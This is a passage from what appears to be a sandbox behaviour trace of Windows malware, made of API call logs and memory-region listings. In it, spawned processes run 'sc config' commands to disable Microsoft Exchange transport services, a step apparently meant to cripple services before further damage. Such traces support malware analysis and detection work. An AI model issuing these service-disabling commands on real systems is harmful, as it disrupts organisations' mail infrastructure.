_String2="PROCESS", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0134.185] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0134.185] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.186] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeTransport start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x459f568*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeTransport start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x459f5b4 | out: lpCommandLine="sc config MSExchangeTransport start= disabled", lpProcessInformation=0x459f5b4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd74, dwThreadId=0xd60)) returned 1 [0134.192] CloseHandle (hObject=0xa4) returned 1 [0134.192] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0134.192] GetEnvironmentStringsW () returned 0x4889f10* [0134.192] FreeEnvironmentStringsA (penv="=") returned 1 [0134.192] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0134.237] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x459f54c | out: lpExitCode=0x459f54c*=0x424) returned 1 [0134.238] CloseHandle (hObject=0xa8) returned 1 [0134.238] _vsnwprintf (in: _Buffer=0x459f634, _BufferCount=0x13, _Format="%08X", _ArgList=0x459f554 | out: _Buffer="00000424") returned 8 [0134.238] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0134.238] GetEnvironmentStringsW () returned 0x488b3a0* [0134.238] FreeEnvironmentStringsA (penv="=") returned 1 [0134.238] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.238] GetEnvironmentStringsW () returned 0x488b3a0* [0134.238] FreeEnvironmentStringsA (penv="=") returned 1 [0134.238] DeleteProcThreadAttributeList (in: lpAttributeList=0x459f5e0 | out: lpAttributeList=0x459f5e0) [0134.238] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.238] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0134.238] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.238] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0134.238] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.238] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0134.239] SetConsoleInputExeNameW () returned 0x1 [0134.239] GetConsoleOutputCP () returned 0x1b5 [0134.239] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.239] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.239] exit (_Code=1060) Thread: id = 569 os_tid = 0xd58 Process: id = "177" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x39460000" os_pid = "0xb1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "176" os_parent_pid = "0xd64" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9142 start_va = 0x7f0fd000 end_va = 0x7f0fdfff entry_point = 0x0 region_type = private name = "private_0x000000007f0fd000" filename = "" Region: id = 9143 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9144 start_va = 0xef92270000 end_va = 0xef9228ffff entry_point = 0x0 region_type = private name = "private_0x000000ef92270000" filename = "" Region: id = 9145 start_va = 0xef92290000 end_va = 0xef922a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef92290000" filename = "" Region: id = 9146 start_va = 0xef922b0000 end_va = 0xef922effff entry_point = 0x0 region_type = private name = "private_0x000000ef922b0000" filename = "" Region: id = 9147 start_va = 0x7df5ffc90000 end_va = 0x7ff5ffc8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc90000" filename = "" Region: id = 9148 start_va = 0x7ff6c3d30000 end_va = 0x7ff6c3d52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3d30000" filename = "" Region: id = 9149 start_va = 0x7ff6c3d5d000 end_va = 0x7ff6c3d5efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d5d000" filename = "" Region: id = 9150 start_va = 0x7ff6c3d5f000 end_va = 0x7ff6c3d5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d5f000" filename = "" Region: id = 9151 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9152 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9153 start_va = 0xef92270000 end_va = 0xef9227ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef92270000" filename = "" Region: id = 9154 start_va = 0xef92280000 end_va = 0xef92286fff entry_point = 0x0 region_type = private name = "private_0x000000ef92280000" filename = "" Region: id = 9155 start_va = 0xef922f0000 end_va = 0xef922f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef922f0000" filename = "" Region: id = 9156 start_va = 0xef92300000 end_va = 0xef92306fff entry_point = 0x0 region_type = private name = "private_0x000000ef92300000" filename = "" Region: id = 9157 start_va = 0xef92310000 end_va = 0xef92310fff entry_point = 0x0 region_type = private name = "private_0x000000ef92310000" filename = "" Region: id = 9158 start_va = 0xef92320000 end_va = 0xef9241ffff entry_point = 0x0 region_type = private name = "private_0x000000ef92320000" filename = "" Region: id = 9159 start_va = 0xef92420000 end_va = 0xef924ddfff entry_point = 0xef92420000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9160 start_va = 0xef924e0000 end_va = 0xef9251ffff entry_point = 0x0 region_type = private name = "private_0x000000ef924e0000" filename = "" Region: id = 9161 start_va = 0xef92520000 end_va = 0xef92520fff entry_point = 0x0 region_type = private name = "private_0x000000ef92520000" filename = "" Region: id = 9162 start_va = 0xef92630000 end_va = 0xef9263ffff entry_point = 0x0 region_type = private name = "private_0x000000ef92630000" filename = "" Region: id = 9163 start_va = 0xef92640000 end_va = 0xef927c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef92640000" filename = "" Region: id = 9164 start_va = 0xef927d0000 end_va = 0xef92950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef927d0000" filename = "" Region: id = 9165 start_va = 0xef92960000 end_va = 0xef93d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ef92960000" filename = "" Region: id = 9166 start_va = 0x7ff6c3c30000 end_va = 0x7ff6c3d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3c30000" filename = "" Region: id = 9167 start_va = 0x7ff6c3d5b000 end_va = 0x7ff6c3d5cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3d5b000" filename = "" Region: id = 9168 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9169 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9170 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9171 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9172 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9173 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9174 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9175 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9176 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9177 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9178 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9179 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9180 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9181 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 566 os_tid = 0xdac Thread: id = 567 os_tid = 0xd88 Thread: id = 568 os_tid = 0xd68 Process: id = "178" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x1041d000" os_pid = "0xd74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "176" os_parent_pid = "0xd64" cmd_line = "sc config MSExchangeTransport start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9195 start_va = 0xb60000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 9196 start_va = 0xb80000 end_va = 0xb81fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 9197 start_va = 0xb90000 end_va = 0xba3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 9198 start_va = 0xbb0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 9199 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 9200 start_va = 0xc30000 end_va = 0xc33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 9201 start_va = 0xc40000 end_va = 0xc40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 9202 start_va = 0xc50000 end_va = 0xc51fff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 9203 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 9204 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 9205 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9206 start_va = 0x7ed70000 end_va = 0x7ed92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed70000" filename = "" Region: id = 9207 start_va = 0x7ed9b000 end_va = 0x7ed9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ed9b000" filename = "" Region: id = 9208 start_va = 0x7ed9e000 end_va = 0x7ed9efff entry_point = 0x0 region_type = private name = "private_0x000000007ed9e000" filename = "" Region: id = 9209 start_va = 0x7ed9f000 end_va = 0x7ed9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ed9f000" filename = "" Region: id = 9210 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9211 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9212 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9213 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9214 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9215 start_va = 0xc90000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 9216 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9217 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9218 start_va = 0xd40000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 9219 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9220 start_va = 0xb60000 end_va = 0xb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 9221 start_va = 0xb70000 end_va = 0xb73fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 9222 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 9223 start_va = 0xce0000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 9224 start_va = 0x4ea0000 end_va = 0x4f5dfff entry_point = 0x4ea0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9225 start_va = 0x5110000 end_va = 0x511ffff entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 9226 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9227 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9228 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9229 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9230 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9231 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9232 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9233 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9234 start_va = 0x7ec70000 end_va = 0x7ed6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec70000" filename = "" Region: id = 9235 start_va = 0x7ed98000 end_va = 0x7ed9afff entry_point = 0x0 region_type = private name = "private_0x000000007ed98000" filename = "" Region: id = 9236 start_va = 0x4f60000 end_va = 0x503efff entry_point = 0x4f60000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 9237 start_va = 0xc60000 end_va = 0xc71fff entry_point = 0xc60000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 570 os_tid = 0xd60 [0134.226] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0134.226] __set_app_type (_Type=0x1) [0134.226] __p__fmode () returned 0x77ac4d6c [0134.226] __p__commode () returned 0x77ac5b1c [0134.226] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0134.226] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0134.227] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.229] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0134.229] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0134.229] _wcsicmp (_String1="config", _String2="query") returned -14 [0134.229] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0134.229] _wcsicmp (_String1="config", _String2="start") returned -16 [0134.229] _wcsicmp (_String1="config", _String2="pause") returned -13 [0134.229] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0134.229] _wcsicmp (_String1="config", _String2="control") returned -14 [0134.229] _wcsicmp (_String1="config", _String2="continue") returned -14 [0134.229] _wcsicmp (_String1="config", _String2="stop") returned -16 [0134.229] _wcsicmp (_String1="config", _String2="config") returned 0 [0134.229] ResolveDelayLoadedAPI () returned 0x77262c10 [0134.229] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xd48558 [0134.231] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0134.231] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0134.231] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0134.231] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0134.231] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0134.231] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0134.231] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0134.231] OpenServiceW (hSCManager=0xd48558, lpServiceName="MSExchangeTransport", dwDesiredAccess=0x3) returned 0x0 [0134.231] GetLastError () returned 0x424 [0134.231] _ultow (in: _Dest=0x424, _Radix=12777496 | out: _Dest=0x424) returned="1060" [0134.231] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0134.232] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xc2f7f4, nSize=0x2, Arguments=0xc2f80c | out: lpBuffer="裨ÔÂ蔔è") returned 0x62 [0134.233] GetFileType (hFile=0x3c) returned 0x2 [0134.233] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc2f7d8 | out: lpMode=0xc2f7d8) returned 1 [0134.233] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd488e8*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xc2f7e8, lpReserved=0x0 | out: lpBuffer=0xd488e8*, lpNumberOfCharsWritten=0xc2f7e8*=0x62) returned 1 [0134.233] LocalFree (hMem=0xd488e8) returned 0x0 [0134.233] LocalFree (hMem=0x0) returned 0x0 [0134.233] CloseServiceHandle (hSCObject=0xd48558) returned 1 [0134.233] LocalFree (hMem=0x0) returned 0x0 [0134.234] exit (_Code=1060) Thread: id = 571 os_tid = 0xd7c Process: id = "179" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3dadc000" os_pid = "0xdcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeTransportLogSearch start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9238 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9239 start_va = 0x7b0000 end_va = 0x47affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 9240 start_va = 0x47b0000 end_va = 0x47cffff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 9241 start_va = 0x47d0000 end_va = 0x47d1fff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 9242 start_va = 0x47e0000 end_va = 0x47f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047e0000" filename = "" Region: id = 9243 start_va = 0x4800000 end_va = 0x483ffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 9244 start_va = 0x4840000 end_va = 0x493ffff entry_point = 0x0 region_type = private name = "private_0x0000000004840000" filename = "" Region: id = 9245 start_va = 0x4940000 end_va = 0x4943fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 9246 start_va = 0x4950000 end_va = 0x4950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004950000" filename = "" Region: id = 9247 start_va = 0x4960000 end_va = 0x4961fff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 9248 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9249 start_va = 0x7ec50000 end_va = 0x7ec72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec50000" filename = "" Region: id = 9250 start_va = 0x7ec79000 end_va = 0x7ec79fff entry_point = 0x0 region_type = private name = "private_0x000000007ec79000" filename = "" Region: id = 9251 start_va = 0x7ec7c000 end_va = 0x7ec7efff entry_point = 0x0 region_type = private name = "private_0x000000007ec7c000" filename = "" Region: id = 9252 start_va = 0x7ec7f000 end_va = 